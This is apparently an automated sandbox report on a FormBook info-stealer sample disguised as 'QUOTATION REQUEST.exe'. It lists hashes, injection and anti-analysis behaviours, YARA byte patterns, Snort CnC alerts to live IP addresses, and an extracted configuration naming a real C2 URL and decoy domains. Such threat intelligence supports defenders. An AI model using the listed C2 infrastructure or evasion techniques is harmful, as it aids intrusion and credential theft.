Play interactive tour

Edit tour

Analysis Report QUOTATION REQUEST.exe

Overview

General Information

Sample Name:	QUOTATION REQUEST.exe
Analysis ID:	402973
MD5:	64af41000584694858d0fcc37b1bf69b
SHA1:	707c77c61fafdd736c1e02bfdbc8ce7ce24cc759
SHA256:	fea7b692b71803eb020f04ec1a5f8118f5845910d9677fdb4636d9a7d209d0fa
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

QUOTATION REQUEST.exe (PID: 4660 cmdline: 'C:\Users\user\Desktop\QUOTATION REQUEST.exe' MD5: 64AF41000584694858D0FCC37B1BF69B)

QUOTATION REQUEST.exe (PID: 4112 cmdline: C:\Users\user\Desktop\QUOTATION REQUEST.exe MD5: 64AF41000584694858D0FCC37B1BF69B)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

wlanext.exe (PID: 5268 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)

cmd.exe (PID: 5784 cmdline: /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.pedroiniesta.net/n7ad/"], "decoy": ["orchardevent.com", "inthebeginningshop.com", "keodm.com", "hangthejury.com", "cannabisllp.com", "letsratethis.com", "milanfashionperu.com", "adcvip.com", "professionalcprclasses.com", "checkmytradesmanswork.com", "sloanksmith.com", "apnajamshedpur.com", "665448.com", "zryld.com", "cabot.city", "graet.design", "furbabiesandflowers.com", "silkisensations.com", "sawubonastore.com", "screenwinz18.com", "freecleanlimpieza.com", "kthayerart.com", "domennyarendi12.net", "buffalobooze.com", "1066704.com", "godstrader.com", "wheyfordays.com", "liquidacion-express.com", "cinmax.xyz", "evamikko.com", "bestsellerselect.com", "fr-doms1.xyz", "publicoon.com", "sciencecopy.com", "buenosbison.icu", "senecadeer.com", "madisonroselove.com", "momanent.com", "colabchat.com", "oodledesigns.com", "dowershop.com", "shop-daily.info", "ivoyletdigital.com", "cqyuebing.net", "market-failure10.com", "lcpcap.com", "textmining.pro", "rodrigueslawgroup.com", "justwearshape.com", "famharmonie.com", "sublimationsuperstore.com", "xoyicgv.icu", "ejaysaffordablewebdesigns62.xyz", "sendanangelofhope.com", "ezglassandgifts.com", "stpl.world", "weddingmaskswv.com", "iprognos.com", "louanatummers.com", "businessboxitalia.network", "hk-duravit.com", "bbss2020.com", "tomojapanesetogo.com", "organicmatico.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1c12b0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1c164a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1e86d0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1e8a6a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1cd35d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1f477d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1cce49:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1f4269:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1cd45f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1f487f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1cd5d7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1f49f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1c2062:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1e9482:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1cc0c4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1f34e4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1c2dda:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ea1fa:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1d244f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f986f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d34f2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1cf381:$sqlite3step: 68 34 1C 7B E1 0x1cf494:$sqlite3step: 68 34 1C 7B E1 0x1f67a1:$sqlite3step: 68 34 1C 7B E1 0x1f68b4:$sqlite3step: 68 34 1C 7B E1 0x1cf3b0:$sqlite3text: 68 38 2A 90 C5 0x1cf4d5:$sqlite3text: 68 38 2A 90 C5 0x1f67d0:$sqlite3text: 68 38 2A 90 C5 0x1f68f5:$sqlite3text: 68 38 2A 90 C5 0x1cf3c3:$sqlite3blob: 68 53 D8 7F 8C 0x1cf4eb:$sqlite3blob: 68 53 D8 7F 8C 0x1f67e3:$sqlite3blob: 68 53 D8 7F 8C 0x1f690b:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: QUOTATION REQUEST.exe PID: 4660	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.QUOTATION REQUEST.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.QUOTATION REQUEST.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.QUOTATION REQUEST.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x127898:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x127c32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14ecb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14f052:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x133945:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15ad65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15a851:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x133a47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15ae67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x133bbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x15afdf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x12864a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14fa6a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1326ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x159acc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1293c2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1507e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x138a37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x15fe57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x139ada:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x135969:$sqlite3step: 68 34 1C 7B E1 0x135a7c:$sqlite3step: 68 34 1C 7B E1 0x15cd89:$sqlite3step: 68 34 1C 7B E1 0x15ce9c:$sqlite3step: 68 34 1C 7B E1 0x135998:$sqlite3text: 68 38 2A 90 C5 0x135abd:$sqlite3text: 68 38 2A 90 C5 0x15cdb8:$sqlite3text: 68 38 2A 90 C5 0x15cedd:$sqlite3text: 68 38 2A 90 C5 0x1359ab:$sqlite3blob: 68 53 D8 7F 8C 0x135ad3:$sqlite3blob: 68 53 D8 7F 8C 0x15cdcb:$sqlite3blob: 68 53 D8 7F 8C 0x15cef3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 4 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.pedroiniesta.net/n7ad/"], "decoy": ["orchardevent.com", "inthebeginningshop.com", "keodm.com", "hangthejury.com", "cannabisllp.com", "letsratethis.com", "milanfashionperu.com", "adcvip.com", "professionalcprclasses.com", "checkmytradesmanswork.com", "sloanksmith.com", "apnajamshedpur.com", "665448.com", "zryld.com", "cabot.city", "graet.design", "furbabiesandflowers.com", "silkisensations.com", "sawubonastore.com", "screenwinz18.com", "freecleanlimpieza.com", "kthayerart.com", "domennyarendi12.net", "buffalobooze.com", "1066704.com", "godstrader.com", "wheyfordays.com", "liquidacion-express.com", "cinmax.xyz", "evamikko.com", "bestsellerselect.com", "fr-doms1.xyz", "publicoon.com", "sciencecopy.com", "buenosbison.icu", "senecadeer.com", "madisonroselove.com", "momanent.com", "colabchat.com", "oodledesigns.com", "dowershop.com", "shop-daily.info", "ivoyletdigital.com", "cqyuebing.net", "market-failure10.com", "lcpcap.com", "textmining.pro", "rodrigueslawgroup.com", "justwearshape.com", "famharmonie.com", "sublimationsuperstore.com", "xoyicgv.icu", "ejaysaffordablewebdesigns62.xyz", "sendanangelofhope.com", "ezglassandgifts.com", "stpl.world", "weddingmaskswv.com", "iprognos.com", "louanatummers.com", "businessboxitalia.network", "hk-duravit.com", "bbss2020.com", "tomojapanesetogo.com", "organicmatico.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: QUOTATION REQUEST.exe	Virustotal: Detection: 18%			Perma Link
Source: QUOTATION REQUEST.exe	ReversingLabs: Detection: 34%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: QUOTATION REQUEST.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: QUOTATION REQUEST.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe
Source:	Binary string: wlanext.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.pedroiniesta.net/n7ad/

